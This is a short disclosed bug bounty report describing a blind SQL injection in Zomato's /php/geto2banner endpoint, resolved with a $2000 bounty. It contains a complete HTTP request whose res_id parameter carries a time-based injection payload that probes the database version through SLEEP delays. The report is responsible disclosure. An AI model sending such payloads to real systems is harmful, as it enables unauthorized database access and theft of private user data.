[www.zomato.com] Blind SQL Injection in /php/geto2banner
Critical
Z
Zomato
Submitted None
Actions:
Reported by
zzzhacker13
Vulnerability Details
Technical details and impact analysis
## Hi Team!
Our team discovered a ``Blind SQL Injection`` by Abusing LocalParams (`res_id`) in `/php/geto2banner`
**We are working to create a full PDF Report as an WriteUp ;)**
## Here is a Temporal Exploit based on the Vulnerable request:
```
POST /php/geto2banner HTTP/1.1
Host: www.zomato.com
Connection: close
Content-Length: 73
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END&city_id=0
```
Thank you so much!!
- As you can see in the request - we are able to **Exploit** it to **extract data from your DB**!
## Impact
## Full database access holding private user information.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$2000.00
Submitted
Weakness
SQL Injection